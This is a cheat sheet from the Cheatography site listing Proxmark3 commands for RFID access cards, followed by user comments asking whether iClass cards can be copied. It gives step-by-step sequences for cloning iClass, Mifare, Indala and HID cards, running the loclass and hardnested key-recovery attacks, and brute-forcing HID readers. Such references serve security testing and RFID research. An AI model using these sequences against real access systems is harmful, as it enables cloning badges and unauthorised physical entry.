Cheatography
https://cheatography.com
iClass
Reverse Permute Master Key |
hf iclass permute r 3F90EBF0910F7B6F
|
Simulate Reader |
|
Dump |
hf iclass dump k AFA785A7DAB33378
|
Read Block |
hf iclass readblk b 7 k AFA785A7DAB33378
|
Write to Block |
hf iclass writeblk b 07 d 6ce099fe7e614fd0 k AFA785A7DAB33378
|
Print Keystore |
|
Add Key to Keystore [0-7] |
hf iclass managekeys n 0 k AFA785A7DAB33378
|
Encrypt Block |
hf iclass encryptblk 0000000f2aa3dba8
|
Load Dump |
hf iclass eload f iclass_tagdump-filename.bin
|
Simulate |
|
Simulation notes:
0 <CSN> simulate the given CSN
1 simulate default CSN
3 Full simulation using emulator memory
Simulate iClass Sequence
pm3 > hf iclass dump k AFA785A7DAB33378
pm3 > hf iclass eload f iclass_tagdump-db883702f8ff12e0.bin
pm3 > hf iclass sim 3
Clone iClass Legacy Sequence
pm3 > hf iclass readblk b 7 k AFA785A7DAB33378
pm3 > hf iclass writeblk b 07 d 6ce099fe7e614fd0 k AFA785A7DAB33378
iClass loclass attack
Extract custom iClass key (loclass attack)
pm3 > hf iclass sim 2
pm3 > hf iclass loclass f iclass_mac_attack.bin
pm3 > hf iclass dump k <Kcus> e
Verify custom iClass key
pm3 > hf iclass lookup u 010a0ffff7ff12e0 p feffffffffffffff m 66348979153c41b9 f default_iclass_keys.dic e
|
|
|
Generic Commands
High Frequency Search |
|
Low Frequency Search |
|
Measure Antenna Characteristics |
|
Check Version |
|
Check overall status |
|
Mifare
Check for Default Keys |
hf mf chk *1 ? d default_keys.dic
|
Dump (0=Mini, 1=1k, 2=2k, 4=4k) |
|
Write to Block |
hf mf wrbl 0 A FFFFFFFFFFFF d3a2859f6b880400c801002000000016
|
Hardnested Attack |
hf mf hardnested 0 A FFFFFFFFFFFF 0 A w
|
Load Dump |
|
Simulate |
|
Run autopwn |
|
Simulate Mifare Sequence
pm3 > hf mf chk *1 ? d default_keys.dic
pm3 > hf mf dump 1
pm3 > script run dumptoemul -i dump.bin
pm3 > hf mf eload 353C2AA6
pm3 > hf mf sim u 353c2aa6
Clone Mifare 1K Sequence
pm3 > hf mf chk *1 ? d default_keys.dic
pm3 > hf mf dump
pm3 > hf mf restore 1 u 4A6CE843 k hf-mf-A29558E4-key.bin f hf-mf-A29558E4-data.bin
Indala
Read |
|
Demodulate |
|
Simulate |
lf indala sim a0000000c2c436c1
|
Clone to T55x7 |
lf indala clone a0000000c2c436c1
|
Lua Scripts
List Scripts |
|
Convert .bin to .eml |
script run dumptoemul -i filename.bin
|
Format Mifare card |
script run formatMifare -k FFFFFFFFFFFF -n FFFFFFFFFFFF -x
|
Options
---
k <key> : the current six byte key
n <key> : the new key
a <access> : the new access bytes
x : execute the commands
|
|
HID Prox
Read |
|
Demodulate |
|
Simulate |
|
Clone to T5577 |
|
Convert Site & Facility code to Wiegand |
|
Brute force HID reader
Options
---
a <format> : 26|33|34|35|37|40|44|84"
f <FC> : 8-bit value, facility code"
c <CN> : (optional) Starting Number, max 65535"
d <delay> : delay in ms. Default 1000ms"
v : verbose logging, show all tries"
---
pm3 > lf hid brute a 26 f 224
pm3 > lf hid brute v a 26 f 21 c 200 d 2000
Raw Data
Get samples |
|
Save samples |
|
Load samples |
|
Hitag
Read Hitag information |
|
Act as Hitag reader |
|
Sniff Hitag traffic |
|
Simulate |
lf hitag sim c378181c_a8f7.ht2
|
Write to Block |
lf hitag writer 24 499602D2 1 00000000
|
Simulate Hitag2 sequence
pm3 > lf hitag reader 21 56713368
pm3 > lf hitag sim c378181c_a8f7.ht2
T55XX
Detect T55XX |
|
Demodulation Config |
|
Write to Block |
lf t55xx wr b 0 d 00081040
|
Factory Reset Tag |
|
Modulation Types
<FSK|FSK1|FSK1a|FSK2|FSK2a|ASK|PSK1|PSK2|NRZ|BI|BIa>
EM is ASK
HID Prox is FSK
Indala is PSK
|
Created By
https://lewys.eu
Metadata
Favourited By
Comments
hi there
i ask about PM3
in china, pm3 sellers said it is not copying HID Iclass key.
but u wrote possible.
so i am confusing.
plz tell me Using PM3, iclass key copying possible?
hi i need information
PM3, it is possible to copy or read /write HID Iclass key code?
sellers said impossible
so i am confused by wrong information.
plz tell me correct information
Add a Comment
Related Cheat Sheets